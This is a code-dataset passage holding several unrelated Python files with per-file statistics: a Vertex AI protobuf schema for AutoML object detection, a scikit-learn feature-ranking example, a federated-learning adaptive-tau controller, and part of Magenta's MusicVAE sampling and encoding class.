        successful_stop_reason (google.cloud.aiplatform.v1.schema.trainingjob.definition_v1.types.AutoMlImageObjectDetectionMetadata.SuccessfulStopReason):
            For successful job completions, this is the
            reason why the job has finished.
    """

    class SuccessfulStopReason(proto.Enum):
        r"""Why training stopped: budget exhausted or model converged."""
        SUCCESSFUL_STOP_REASON_UNSPECIFIED = 0
        BUDGET_REACHED = 1
        MODEL_CONVERGED = 2

    cost_milli_node_hours = proto.Field(proto.INT64, number=1)

    successful_stop_reason = proto.Field(
        proto.ENUM, number=2, enum=SuccessfulStopReason,
    )
__all__ = tuple(sorted(__protobuf__.manifest))
| 37.341085 | 155 | 0.688188 |
import proto
__protobuf__ = proto.module(
package="google.cloud.aiplatform.v1.schema.trainingjob.definition",
manifest={
"AutoMlImageObjectDetection",
"AutoMlImageObjectDetectionInputs",
"AutoMlImageObjectDetectionMetadata",
},
)
class AutoMlImageObjectDetection(proto.Message):
inputs = proto.Field(
proto.MESSAGE, number=1, message="AutoMlImageObjectDetectionInputs",
)
metadata = proto.Field(
proto.MESSAGE, number=2, message="AutoMlImageObjectDetectionMetadata",
)
class AutoMlImageObjectDetectionInputs(proto.Message):
class ModelType(proto.Enum):
MODEL_TYPE_UNSPECIFIED = 0
CLOUD_HIGH_ACCURACY_1 = 1
CLOUD_LOW_LATENCY_1 = 2
MOBILE_TF_LOW_LATENCY_1 = 3
MOBILE_TF_VERSATILE_1 = 4
MOBILE_TF_HIGH_ACCURACY_1 = 5
model_type = proto.Field(proto.ENUM, number=1, enum=ModelType,)
budget_milli_node_hours = proto.Field(proto.INT64, number=2)
disable_early_stopping = proto.Field(proto.BOOL, number=3)
class AutoMlImageObjectDetectionMetadata(proto.Message):
class SuccessfulStopReason(proto.Enum):
SUCCESSFUL_STOP_REASON_UNSPECIFIED = 0
BUDGET_REACHED = 1
MODEL_CONVERGED = 2
cost_milli_node_hours = proto.Field(proto.INT64, number=1)
successful_stop_reason = proto.Field(
proto.ENUM, number=2, enum=SuccessfulStopReason,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| true | true |
1c2ca03875f2f69020ef92da8bca31da599ca215 | 921 | py | Python | examples/feature_selection/plot_rfe_digits.py | emarkou/scikit-learn | d73822f84f2832dcc25f0ff58769f60871a78025 | [
"BSD-3-Clause"
] | 23 | 2020-04-15T14:02:00.000Z | 2022-03-10T23:17:32.000Z | examples/feature_selection/plot_rfe_digits.py | emarkou/scikit-learn | d73822f84f2832dcc25f0ff58769f60871a78025 | [
"BSD-3-Clause"
] | 29 | 2021-03-04T02:56:48.000Z | 2021-04-06T04:06:45.000Z | examples/feature_selection/plot_rfe_digits.py | emarkou/scikit-learn | d73822f84f2832dcc25f0ff58769f60871a78025 | [
"BSD-3-Clause"
] | 18 | 2020-04-15T14:22:33.000Z | 2022-02-16T06:48:34.000Z | """
=============================
Recursive feature elimination
=============================
A recursive feature elimination example showing the relevance of pixels in
a digit classification task.
.. note::
See also :ref:`sphx_glr_auto_examples_feature_selection_plot_rfe_with_cross_validation.py`
"""
print(__doc__)

from sklearn.svm import SVC
from sklearn.datasets import load_digits
from sklearn.feature_selection import RFE
import matplotlib.pyplot as plt

# Load the digits dataset and flatten each image into one feature row per
# sample (one feature per pixel).
digits = load_digits()
X = digits.images.reshape((len(digits.images), -1))
y = digits.target

# Create the RFE object and rank each pixel: with step=1 and
# n_features_to_select=1, RFE repeatedly refits the linear SVC and removes
# the single least important feature until one remains, so ranking_ gives a
# full ordering of the pixels (rank 1 = most relevant, per sklearn's RFE).
svc = SVC(kernel="linear", C=1)
rfe = RFE(estimator=svc, n_features_to_select=1, step=1)
rfe.fit(X, y)
ranking = rfe.ranking_.reshape(digits.images[0].shape)

# Plot pixel ranking as an image in the original digit shape.
plt.matshow(ranking, cmap=plt.cm.Blues)
plt.colorbar()
plt.title("Ranking of pixels with RFE")
plt.show()
| 24.891892 | 94 | 0.724213 | print(__doc__)
from sklearn.svm import SVC
from sklearn.datasets import load_digits
from sklearn.feature_selection import RFE
import matplotlib.pyplot as plt
digits = load_digits()
X = digits.images.reshape((len(digits.images), -1))
y = digits.target
svc = SVC(kernel="linear", C=1)
rfe = RFE(estimator=svc, n_features_to_select=1, step=1)
rfe.fit(X, y)
ranking = rfe.ranking_.reshape(digits.images[0].shape)
plt.matshow(ranking, cmap=plt.cm.Blues)
plt.colorbar()
plt.title("Ranking of pixels with RFE")
plt.show()
| true | true |
1c2ca105ffaace5c78f7b401dd5af0da9c9e6ff1 | 8,162 | py | Python | control_algorithm/adaptive_tau.py | arj119/adaptive-federated-learning | c7e949bfcfd9a166780f5be838141d51016a7673 | [
"MIT"
] | 94 | 2020-04-14T02:42:26.000Z | 2022-03-23T13:54:31.000Z | control_algorithm/adaptive_tau.py | PengchaoHan/adaptive-federated-learning | 6c22d65c3a46a0b293dc5ddd4cd579f6010445f5 | [
"MIT"
] | 2 | 2021-12-10T07:46:44.000Z | 2022-01-19T23:39:30.000Z | control_algorithm/adaptive_tau.py | PengchaoHan/adaptive-federated-learning | 6c22d65c3a46a0b293dc5ddd4cd579f6010445f5 | [
"MIT"
] | 44 | 2020-05-07T16:25:04.000Z | 2022-03-24T10:48:26.000Z | import math
import numpy as np
from numpy import linalg
from util.utils import recv_msg, send_msg, moving_average
from config import tau_max
class ControlAlgAdaptiveTauServer:
    """Server side of the adaptive local-update (tau) control algorithm.

    Each round it collects the locally estimated control parameters
    (beta, rho, and the gradient at the global weights) from all clients,
    maintains moving averages of them, and searches for the number of local
    iterations ``tau`` that minimizes an estimated optimality-gap expression
    under the remaining time budget.
    """

    def __init__(self, is_adapt_local, dim_w, client_sock_all, n_nodes, control_param_phi,
                 moving_average_holding_param):
        # If False, compute_new_tau() still drains the client messages but
        # always returns the unchanged tau (capped at tau_max).
        self.is_adapt_local = is_adapt_local
        # Dimension of the flattened model weight/gradient vector.
        self.dim_w = dim_w
        self.client_sock_all = client_sock_all
        self.n_nodes = n_nodes
        self.control_param_phi = control_param_phi
        self.moving_average_holding_param = moving_average_holding_param
        # Moving averages of the control parameters; None until the first
        # round in which at least one client reports values.
        self.beta_adapt_mvaverage = None
        self.delta_adapt_mvaverage = None
        self.rho_adapt_mvaverage = None

    def compute_new_tau(self, data_size_local_all, data_size_total, it_each_local, it_each_global, max_time,
                        step_size, tau, use_min_loss):
        """Receive control parameters from all clients and return the new tau.

        Args:
            data_size_local_all: per-client local dataset sizes (weights for
                the data-size-weighted averages below).
            data_size_total: sum of all local dataset sizes.
            it_each_local: estimated wall time of one local iteration (or
                None before it is measured, which disables adaptation).
            it_each_global: estimated wall time of one global aggregation
                (or None, same effect).
            max_time: total wall-time budget.
            step_size: gradient step size used by the clients.
            tau: current number of local iterations per round.
            use_min_loss: if True, reserve one extra round's time from the
                budget when computing the adjusted iteration count T.

        Returns:
            The new tau, capped at the configured tau_max.
        """
        beta_adapt = 0
        delta_adapt = 0
        rho_adapt = 0
        global_grad_global_weight = np.zeros(self.dim_w)
        local_grad_global_weight_all = []
        control_param_computed = False

        # Always receive one status message per client so the protocol stays
        # in sync, even when no parameters follow.
        for n in range(0, self.n_nodes):
            msg = recv_msg(self.client_sock_all[n], 'MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER')
            # ['MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER', control_param_computed]
            control_param_computed_this_client = msg[1]  # Boolean: whether parameters for the
            # control algorithm follow this message.
            control_param_computed = control_param_computed or control_param_computed_this_client

            # Receive the additional message only if this client computed it.
            if control_param_computed_this_client:
                msg = recv_msg(self.client_sock_all[n], 'MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER')
                # ['MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER', betaAdapt, rhoAdapt, localGradGlobalWeight]
                beta_adapt_local = msg[1]
                rho_adapt_local = msg[2]
                local_grad_global_weight = msg[3]
                local_grad_global_weight_all.append(local_grad_global_weight)
                # Accumulate data-size-weighted sums; divided by
                # data_size_total below to form weighted averages.
                beta_adapt += data_size_local_all[n] * beta_adapt_local
                rho_adapt += data_size_local_all[n] * rho_adapt_local
                global_grad_global_weight += data_size_local_all[n] * local_grad_global_weight

        global_grad_global_weight /= data_size_total

        if control_param_computed and (it_each_local is not None) and (it_each_global is not None):
            # Finalize beta, rho and delta computation (weighted averages).
            beta_adapt /= data_size_total
            rho_adapt /= data_size_total
            for i in range(0, self.n_nodes):
                # delta: weighted average distance between each local gradient
                # and the global gradient (gradient-divergence estimate).
                delta_adapt += data_size_local_all[i] * linalg.norm(local_grad_global_weight_all[i]
                                                                    - global_grad_global_weight)
            delta_adapt /= data_size_total

            # Smooth the per-round estimates with moving averages.
            self.beta_adapt_mvaverage = moving_average(self.beta_adapt_mvaverage, beta_adapt, self.moving_average_holding_param)
            self.delta_adapt_mvaverage = moving_average(self.delta_adapt_mvaverage, delta_adapt, self.moving_average_holding_param)
            self.rho_adapt_mvaverage = moving_average(self.rho_adapt_mvaverage, rho_adapt, self.moving_average_holding_param)

            print('betaAdapt_mvaverage =', self.beta_adapt_mvaverage)
            print('deltaAdapt_mvaverage =', self.delta_adapt_mvaverage)
            print('rhoAdapt_mvaverage =', self.rho_adapt_mvaverage)

            # Find tau if using the control algorithm.
            if self.is_adapt_local:
                # Exhaustive search for the tau minimizing the estimated gap,
                # over candidates 1..tau*10.
                min_tau_new_tmp = 1
                min_val = float('inf')
                for tau_new_tmp in range(1, tau * 10 + 1):
                    # h(tau) term; clamped at 0 from below.
                    h_tau_tmp = max(0.0, (self.delta_adapt_mvaverage / self.beta_adapt_mvaverage) * (
                            np.power(step_size * self.beta_adapt_mvaverage + 1,
                                     tau_new_tmp) - 1) - self.delta_adapt_mvaverage * step_size * tau_new_tmp)
                    # Gap expression with betaAdapt and rhoAdapt, plus the
                    # additional h(tau) term.
                    if use_min_loss:
                        tmp_adjusted_T = (max_time - it_each_local - it_each_global) * tau_new_tmp / \
                                         (it_each_local * tau_new_tmp + it_each_global)
                    else:
                        tmp_adjusted_T = max_time * tau_new_tmp / (it_each_local * tau_new_tmp + it_each_global)
                    tmp_gap = (1 + math.sqrt(max(0.0, 1 + 4 * math.pow(tmp_adjusted_T, 2.0)
                                                 * self.control_param_phi * self.rho_adapt_mvaverage
                                                 * step_size * h_tau_tmp / tau_new_tmp))) / (
                                      2 * tmp_adjusted_T * step_size * self.control_param_phi) + self.rho_adapt_mvaverage * h_tau_tmp
                    if tmp_gap < min_val:
                        min_val = tmp_gap
                        min_tau_new_tmp = tau_new_tmp
                tau_new = min_tau_new_tmp
            else:
                tau_new = tau
        else:
            tau_new = tau

        return min(tau_new, tau_max)

    def __getstate__(self):
        # Remove the (unpicklable) sockets from the pickled state.
        state = self.__dict__.copy()
        del state['client_sock_all']
        return state
class ControlAlgAdaptiveTauClient:
    """Client side of the adaptive local-update (tau) control algorithm.

    Tracks the weights, gradient and loss of the last local iteration of the
    previous round so that, at the end of each round, it can estimate the
    Lipschitz parameters beta (gradient smoothness) and rho (loss smoothness)
    and report them to the server via send_to_server().
    """

    def __init__(self):
        # State carried over from the previous round; None until one full
        # round has completed, so the first round reports nothing.
        self.w_last_local_last_round = None
        self.grad_last_local_last_round = None
        self.loss_last_local_last_round = None

    def init_new_round(self, w):
        """Reset per-round state. `w` is accepted for interface symmetry
        with other control algorithms and is unused here."""
        self.control_param_computed = False
        self.beta_adapt = None
        self.rho_adapt = None
        self.grad_last_global = None

    def update_after_each_local(self, iteration_index, w, grad, total_iterations):
        """Called after every local iteration; captures the gradient at the
        global weights (iteration 0). Always returns False (never requests
        early termination of the local loop)."""
        if iteration_index == 0:
            self.grad_last_global = grad
        return False

    def update_after_all_local(self, model, train_image, train_label, train_indices,
                               w, w_last_global, loss_last_global):
        """Estimate beta and rho after all local iterations of a round.

        Only beta and rho can be computed locally; delta is computed globally
        by the server. Also records this round's final weights, gradient and
        loss for use in the next round's estimates.
        """
        if (self.w_last_local_last_round is not None) and (self.grad_last_local_last_round is not None) and \
                (self.loss_last_local_last_round is not None):
            # beta: ||grad(w_prev) - grad(w_global)|| / ||w_prev - w_global||,
            # a local estimate of gradient smoothness.
            grad_diff = self.grad_last_local_last_round - self.grad_last_global
            w_diff_norm = linalg.norm(self.w_last_local_last_round - w_last_global)
            if w_diff_norm > 1e-10:  # avoid division by (near) zero
                self.beta_adapt = linalg.norm(grad_diff) / w_diff_norm
            else:
                self.beta_adapt = 0

            # rho: |loss(w_prev) - loss(w_global)| / ||w_prev - w_global||,
            # a local estimate of loss smoothness.
            if w_diff_norm > 1e-10:
                self.rho_adapt = linalg.norm(self.loss_last_local_last_round - loss_last_global) / w_diff_norm
            else:
                self.rho_adapt = 0

            # Guard against degenerate or NaN estimates: the server divides
            # by beta, so it is floored at a small positive value.
            if self.beta_adapt < 1e-5 or np.isnan(self.beta_adapt):
                self.beta_adapt = 1e-5
            if np.isnan(self.rho_adapt):
                self.rho_adapt = 0

            print('betaAdapt =', self.beta_adapt)
            self.control_param_computed = True

        # Record this round's final state for the next round's estimates.
        self.grad_last_local_last_round = model.gradient(train_image, train_label, w, train_indices)
        try:
            self.loss_last_local_last_round = model.loss_from_prev_gradient_computation()
        except Exception:
            # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
            # are not swallowed. Raised when the model does not support
            # computing the loss from the previous gradient computation.
            self.loss_last_local_last_round = model.loss(train_image, train_label, w, train_indices)
        self.w_last_local_last_round = w

    def send_to_server(self, sock):
        """Send the status flag and, if computed, the control parameters."""
        msg = ['MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER', self.control_param_computed]
        send_msg(sock, msg)

        if self.control_param_computed:
            msg = ['MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER', self.beta_adapt, self.rho_adapt, self.grad_last_global]
            send_msg(sock, msg)
| 43.414894 | 131 | 0.633301 | import math
import numpy as np
from numpy import linalg
from util.utils import recv_msg, send_msg, moving_average
from config import tau_max
class ControlAlgAdaptiveTauServer:
def __init__(self, is_adapt_local, dim_w, client_sock_all, n_nodes, control_param_phi,
moving_average_holding_param):
self.is_adapt_local = is_adapt_local
self.dim_w = dim_w
self.client_sock_all = client_sock_all
self.n_nodes = n_nodes
self.control_param_phi = control_param_phi
self.moving_average_holding_param = moving_average_holding_param
self.beta_adapt_mvaverage = None
self.delta_adapt_mvaverage = None
self.rho_adapt_mvaverage = None
def compute_new_tau(self, data_size_local_all, data_size_total, it_each_local, it_each_global, max_time,
step_size, tau, use_min_loss):
beta_adapt = 0
delta_adapt = 0
rho_adapt = 0
global_grad_global_weight = np.zeros(self.dim_w)
local_grad_global_weight_all = []
control_param_computed = False
for n in range(0, self.n_nodes):
msg = recv_msg(self.client_sock_all[n], 'MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER')
control_param_computed_this_client = msg[1]
control_param_computed = control_param_computed or control_param_computed_this_client
if control_param_computed_this_client:
msg = recv_msg(self.client_sock_all[n], 'MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER')
beta_adapt_local = msg[1]
rho_adapt_local = msg[2]
local_grad_global_weight = msg[3]
local_grad_global_weight_all.append(local_grad_global_weight)
beta_adapt += data_size_local_all[n] * beta_adapt_local
rho_adapt += data_size_local_all[n] * rho_adapt_local
global_grad_global_weight += data_size_local_all[n] * local_grad_global_weight
global_grad_global_weight /= data_size_total
if control_param_computed and (it_each_local is not None) and (it_each_global is not None):
beta_adapt /= data_size_total
rho_adapt /= data_size_total
for i in range(0, self.n_nodes):
delta_adapt += data_size_local_all[i] * linalg.norm(local_grad_global_weight_all[i]
- global_grad_global_weight)
delta_adapt /= data_size_total
self.beta_adapt_mvaverage = moving_average(self.beta_adapt_mvaverage, beta_adapt, self.moving_average_holding_param)
self.delta_adapt_mvaverage = moving_average(self.delta_adapt_mvaverage, delta_adapt, self.moving_average_holding_param)
self.rho_adapt_mvaverage = moving_average(self.rho_adapt_mvaverage, rho_adapt, self.moving_average_holding_param)
print('betaAdapt_mvaverage =', self.beta_adapt_mvaverage)
print('deltaAdapt_mvaverage =', self.delta_adapt_mvaverage)
print('rhoAdapt_mvaverage =', self.rho_adapt_mvaverage)
if self.is_adapt_local:
min_tau_new_tmp = 1
min_val = float('inf')
for tau_new_tmp in range(1, tau * 10 + 1):
h_tau_tmp = max(0.0, (self.delta_adapt_mvaverage / self.beta_adapt_mvaverage) * (
np.power(step_size * self.beta_adapt_mvaverage + 1,
tau_new_tmp) - 1) - self.delta_adapt_mvaverage * step_size * tau_new_tmp)
if use_min_loss:
tmp_adjusted_T = (max_time - it_each_local - it_each_global) * tau_new_tmp / \
(it_each_local * tau_new_tmp + it_each_global)
else:
tmp_adjusted_T = max_time * tau_new_tmp / (it_each_local * tau_new_tmp + it_each_global)
tmp_gap = (1 + math.sqrt(max(0.0, 1 + 4 * math.pow(tmp_adjusted_T, 2.0)
* self.control_param_phi * self.rho_adapt_mvaverage
* step_size * h_tau_tmp / tau_new_tmp))) / (
2 * tmp_adjusted_T * step_size * self.control_param_phi) + self.rho_adapt_mvaverage * h_tau_tmp
if tmp_gap < min_val:
min_val = tmp_gap
min_tau_new_tmp = tau_new_tmp
tau_new = min_tau_new_tmp
else:
tau_new = tau
else:
tau_new = tau
return min(tau_new, tau_max)
def __getstate__(self):
state = self.__dict__.copy()
del state['client_sock_all']
return state
class ControlAlgAdaptiveTauClient:
def __init__(self):
self.w_last_local_last_round = None
self.grad_last_local_last_round = None
self.loss_last_local_last_round = None
def init_new_round(self, w):
self.control_param_computed = False
self.beta_adapt = None
self.rho_adapt = None
self.grad_last_global = None
def update_after_each_local(self, iteration_index, w, grad, total_iterations):
if iteration_index == 0:
self.grad_last_global = grad
return False
def update_after_all_local(self, model, train_image, train_label, train_indices,
w, w_last_global, loss_last_global):
if (self.w_last_local_last_round is not None) and (self.grad_last_local_last_round is not None) and \
(self.loss_last_local_last_round is not None):
c = self.grad_last_local_last_round - self.grad_last_global
tmp_norm = linalg.norm(self.w_last_local_last_round - w_last_global)
if tmp_norm > 1e-10:
self.beta_adapt = linalg.norm(c) / tmp_norm
else:
self.beta_adapt = 0
if tmp_norm > 1e-10:
self.rho_adapt = linalg.norm(self.loss_last_local_last_round - loss_last_global) / tmp_norm
else:
self.rho_adapt = 0
if self.beta_adapt < 1e-5 or np.isnan(self.beta_adapt):
self.beta_adapt = 1e-5
if np.isnan(self.rho_adapt):
self.rho_adapt = 0
print('betaAdapt =', self.beta_adapt)
self.control_param_computed = True
self.grad_last_local_last_round = model.gradient(train_image, train_label, w, train_indices)
try:
self.loss_last_local_last_round = model.loss_from_prev_gradient_computation()
except:
self.loss_last_local_last_round = model.loss(train_image, train_label, w, train_indices)
self.w_last_local_last_round = w
def send_to_server(self, sock):
msg = ['MSG_CONTROL_PARAM_COMPUTED_CLIENT_TO_SERVER', self.control_param_computed]
send_msg(sock, msg)
if self.control_param_computed:
msg = ['MSG_BETA_RHO_GRAD_CLIENT_TO_SERVER', self.beta_adapt, self.rho_adapt, self.grad_last_global]
send_msg(sock, msg)
| true | true |
1c2ca250665e6de8aba306124ca10a854862961b | 13,468 | py | Python | magenta/models/music_vae/trained_model.py | veskoch/magenta | 74f16be4341925341617699dffdbddadd747acad | [
"Apache-2.0"
] | 5 | 2018-07-11T02:39:40.000Z | 2020-09-07T19:26:46.000Z | magenta/models/music_vae/trained_model.py | veskoch/magenta | 74f16be4341925341617699dffdbddadd747acad | [
"Apache-2.0"
] | 1 | 2022-02-11T19:01:43.000Z | 2022-02-11T19:01:56.000Z | magenta/models/music_vae/trained_model.py | veskoch/magenta | 74f16be4341925341617699dffdbddadd747acad | [
"Apache-2.0"
] | 2 | 2018-07-11T13:36:19.000Z | 2018-09-01T03:42:04.000Z | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A class for sampling, encoding, and decoding from trained MusicVAE models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import re
# internal imports
import numpy as np
import tensorflow as tf
class NoExtractedExamplesException(Exception):
  """Raised by encode() when no examples are extracted from a NoteSequence."""
  pass


class MultipleExtractedExamplesException(Exception):
  """Raised by encode() when multiple examples are extracted from a
  NoteSequence (exactly one is required)."""
  pass
class TrainedModel(object):
  """An interface to a trained model for encoding, decoding, and sampling.

  Args:
    config: The Config to build the model graph with.
    batch_size: The batch size to build the model graph with.
    checkpoint_dir_or_path: The directory containing checkpoints for the model,
      the most recent of which will be loaded, or a direct path to a specific
      checkpoint.
    var_name_substitutions: Optional list of string pairs containing regex
      patterns and substitution values for renaming model variables to match
      those in the checkpoint. Useful for backwards compatibility.
    session_target: Optional execution engine to connect to. Defaults to
      in-process.
    sample_kwargs: Additional, non-tensor keyword arguments to pass to sample
      call.
  """

  def __init__(self, config, batch_size, checkpoint_dir_or_path=None,
               var_name_substitutions=None, session_target='', **sample_kwargs):
    # Accept either a checkpoint directory (load the latest) or a direct path.
    checkpoint_path = (tf.train.latest_checkpoint(checkpoint_dir_or_path)
                       if tf.gfile.IsDirectory(checkpoint_dir_or_path) else
                       checkpoint_dir_or_path)
    # Deep-copy so mutating hparams below does not affect the caller's config.
    self._config = copy.deepcopy(config)
    self._config.hparams.batch_size = batch_size
    with tf.Graph().as_default():
      model = self._config.model
      model.build(
          self._config.hparams,
          self._config.data_converter.output_depth,
          is_training=False)
      # Input placeholders. z/c placeholders are only created when the model
      # is conditional (z_size) / uses control signals (control_depth > 0).
      self._temperature = tf.placeholder(tf.float32, shape=())
      self._z_input = (
          tf.placeholder(tf.float32,
                         shape=[batch_size, self._config.hparams.z_size])
          if self._config.hparams.z_size else None)
      self._c_input = (
          tf.placeholder(
              tf.float32,
              shape=[None, self._config.data_converter.control_depth])
          if self._config.data_converter.control_depth > 0 else None)
      self._inputs = tf.placeholder(
          tf.float32,
          shape=[batch_size, None, self._config.data_converter.input_depth])
      self._controls = tf.placeholder(
          tf.float32,
          shape=[batch_size, None, self._config.data_converter.control_depth])
      self._inputs_length = tf.placeholder(
          tf.int32,
          shape=[batch_size] + list(self._config.data_converter.length_shape))
      self._max_length = tf.placeholder(tf.int32, shape=())
      # Outputs
      self._outputs, self._decoder_results = model.sample(
          batch_size,
          max_length=self._max_length,
          z=self._z_input,
          c_input=self._c_input,
          temperature=self._temperature,
          **sample_kwargs)
      if self._config.hparams.z_size:
        q_z = model.encode(self._inputs, self._inputs_length, self._controls)
        self._mu = q_z.loc
        self._sigma = q_z.scale.diag
        self._z = q_z.sample()
      # Optionally remap variable names (regex substitutions) so older
      # checkpoints with different naming can still be restored.
      var_map = None
      if var_name_substitutions is not None:
        var_map = {}
        for v in tf.global_variables():
          var_name = v.name[:-2]  # Strip ':0' suffix.
          for pattern, substitution in var_name_substitutions:
            var_name = re.sub(pattern, substitution, var_name)
          if var_name != v.name[:-2]:
            tf.logging.info('Renaming `%s` to `%s`.', v.name[:-2], var_name)
          var_map[var_name] = v
      # Restore graph
      self._sess = tf.Session(target=session_target)
      saver = tf.train.Saver(var_map)
      saver.restore(self._sess, checkpoint_path)

  def sample(self, n=None, length=None, temperature=1.0, same_z=False,
             c_input=None):
    """Generates random samples from the model.

    Args:
      n: The number of samples to return. A full batch will be returned if not
        specified.
      length: The maximum length of a sample in decoder iterations. Required
        if end tokens are not being used.
      temperature: The softmax temperature to use (if applicable).
      same_z: Whether to use the same latent vector for all samples in the
        batch (if applicable).
      c_input: A sequence of control inputs to use for all samples (if
        applicable).

    Returns:
      A list of samples as NoteSequence objects.

    Raises:
      ValueError: If `length` is not specified and an end token is not being
        used.
    """
    batch_size = self._config.hparams.batch_size
    n = n or batch_size
    z_size = self._config.hparams.z_size

    if not length and self._config.data_converter.end_token is None:
      raise ValueError(
          'A length must be specified when the end token is not used.')
    length = length or tf.int32.max

    feed_dict = {
        self._temperature: temperature,
        self._max_length: length
    }
    # With same_z, one latent vector is drawn and tiled across the batch.
    if self._z_input is not None and same_z:
      z = np.random.randn(z_size).astype(np.float32)
      z = np.tile(z, (batch_size, 1))
      feed_dict[self._z_input] = z

    if self._c_input is not None:
      feed_dict[self._c_input] = c_input

    # Run enough full batches to cover n samples; trim the excess below.
    outputs = []
    for _ in range(int(np.ceil(n / batch_size))):
      if self._z_input is not None and not same_z:
        feed_dict[self._z_input] = (
            np.random.randn(batch_size, z_size).astype(np.float32))
      outputs.append(self._sess.run(self._outputs, feed_dict))
    samples = np.vstack(outputs)[:n]
    if self._c_input is not None:
      return self._config.data_converter.to_items(
          samples, np.tile(np.expand_dims(c_input, 0), [batch_size, 1, 1]))
    else:
      return self._config.data_converter.to_items(samples)

  def encode(self, note_sequences, assert_same_length=False):
    """Encodes a collection of NoteSequences into latent vectors.

    Args:
      note_sequences: A collection of NoteSequence objects to encode.
      assert_same_length: Whether to raise an AssertionError if all of the
        extracted sequences are not the same length.

    Returns:
      The encoded `z`, `mu`, and `sigma` values.

    Raises:
      RuntimeError: If called for a non-conditional model.
      NoExtractedExamplesException: If no examples were extracted.
      MultipleExtractedExamplesException: If multiple examples were extracted.
      AssertionError: If `assert_same_length` is True and any extracted
        sequences differ in length.
    """
    if not self._config.hparams.z_size:
      raise RuntimeError('Cannot encode with a non-conditional model.')

    # Each NoteSequence must yield exactly one example tensor.
    inputs = []
    controls = []
    lengths = []
    for note_sequence in note_sequences:
      extracted_tensors = self._config.data_converter.to_tensors(note_sequence)
      if not extracted_tensors.inputs:
        raise NoExtractedExamplesException(
            'No examples extracted from NoteSequence: %s' % note_sequence)
      if len(extracted_tensors.inputs) > 1:
        raise MultipleExtractedExamplesException(
            'Multiple (%d) examples extracted from NoteSequence: %s' %
            (len(extracted_tensors.inputs), note_sequence))
      inputs.append(extracted_tensors.inputs[0])
      controls.append(extracted_tensors.controls[0])
      lengths.append(extracted_tensors.lengths[0])
      # Compare each new sequence against the first one.
      if assert_same_length and len(inputs[0]) != len(inputs[-1]):
        raise AssertionError(
            'Sequences 0 and %d have different lengths: %d vs %d' %
            (len(inputs) - 1, len(inputs[0]), len(inputs[-1])))
    return self.encode_tensors(inputs, lengths, controls)

  def encode_tensors(self, input_tensors, lengths, control_tensors=None):
    """Encodes a collection of input tensors into latent vectors.

    Args:
      input_tensors: Collection of input tensors to encode.
      lengths: Collection of lengths of input tensors.
      control_tensors: Collection of control tensors to encode.

    Returns:
      The encoded `z`, `mu`, and `sigma` values.

    Raises:
      RuntimeError: If called for a non-conditional model.
    """
    if not self._config.hparams.z_size:
      raise RuntimeError('Cannot encode with a non-conditional model.')

    n = len(input_tensors)
    input_depth = self._config.data_converter.input_depth
    batch_size = self._config.hparams.batch_size

    # Pad with empty examples so the total count is a multiple of batch_size;
    # the padding is stripped from the results at the end ([:n]).
    batch_pad_amt = -n % batch_size
    if batch_pad_amt > 0:
      input_tensors += [np.zeros([0, input_depth])] * batch_pad_amt
    length_array = np.array(lengths, np.int32)
    length_array = np.pad(
        length_array,
        [(0, batch_pad_amt)] + [(0, 0)] * (length_array.ndim - 1),
        'constant')

    # Zero-pad every example along time to the longest example.
    max_length = max([len(t) for t in input_tensors])
    inputs_array = np.zeros(
        [len(input_tensors), max_length, input_depth])
    for i, t in enumerate(input_tensors):
      inputs_array[i, :len(t)] = t

    control_depth = self._config.data_converter.control_depth
    controls_array = np.zeros(
        [len(input_tensors), max_length, control_depth])
    if control_tensors is not None:
      control_tensors += [np.zeros([0, control_depth])] * batch_pad_amt
      for i, t in enumerate(control_tensors):
        controls_array[i, :len(t)] = t

    outputs = []
    for i in range(len(inputs_array) // batch_size):
      batch_begin = i * batch_size
      batch_end = (i+1) * batch_size
      feed_dict = {self._inputs: inputs_array[batch_begin:batch_end],
                   self._controls: controls_array[batch_begin:batch_end],
                   self._inputs_length: length_array[batch_begin:batch_end]}
      outputs.append(
          self._sess.run([self._z, self._mu, self._sigma], feed_dict))
    assert outputs
    # Stack per-batch results and strip the padding examples.
    return tuple(np.vstack(v)[:n] for v in zip(*outputs))

  def decode(self, z, length=None, temperature=1.0, c_input=None):
    """Decodes a collection of latent vectors into NoteSequences.

    Args:
      z: A collection of latent vectors to decode.
      length: The maximum length of a sample in decoder iterations. Required
        if end tokens are not being used.
      temperature: The softmax temperature to use (if applicable).
      c_input: Control sequence (if applicable).

    Returns:
      A list of decodings as NoteSequence objects.

    Raises:
      RuntimeError: If called for a non-conditional model.
      ValueError: If `length` is not specified and an end token is not being
        used.
    """
    tensors = self.decode_to_tensors(z, length, temperature, c_input)
    if self._c_input is not None:
      return self._config.data_converter.to_items(
          tensors, np.tile(np.expand_dims(c_input, 0),
                           [self._config.hparams.batch_size, 1, 1]))
    else:
      return self._config.data_converter.to_items(tensors)

  def decode_to_tensors(self, z, length=None, temperature=1.0, c_input=None,
                        return_full_results=False):
    """Decodes a collection of latent vectors into output tensors.

    Args:
      z: A collection of latent vectors to decode.
      length: The maximum length of a sample in decoder iterations. Required
        if end tokens are not being used.
      temperature: The softmax temperature to use (if applicable).
      c_input: Control sequence (if applicable).
      return_full_results: If true will return the full decoder_results,
        otherwise it will return only the samples.

    Returns:
      If return_full_results is True, will return the full decoder_results
      list, otherwise it will return the samples from the decoder as a 2D
      numpy array.

    Raises:
      RuntimeError: If called for a non-conditional model.
      ValueError: If `length` is not specified and an end token is not being
        used.
    """
    if not self._config.hparams.z_size:
      raise RuntimeError('Cannot decode with a non-conditional model.')

    if not length and self._config.data_converter.end_token is None:
      raise ValueError(
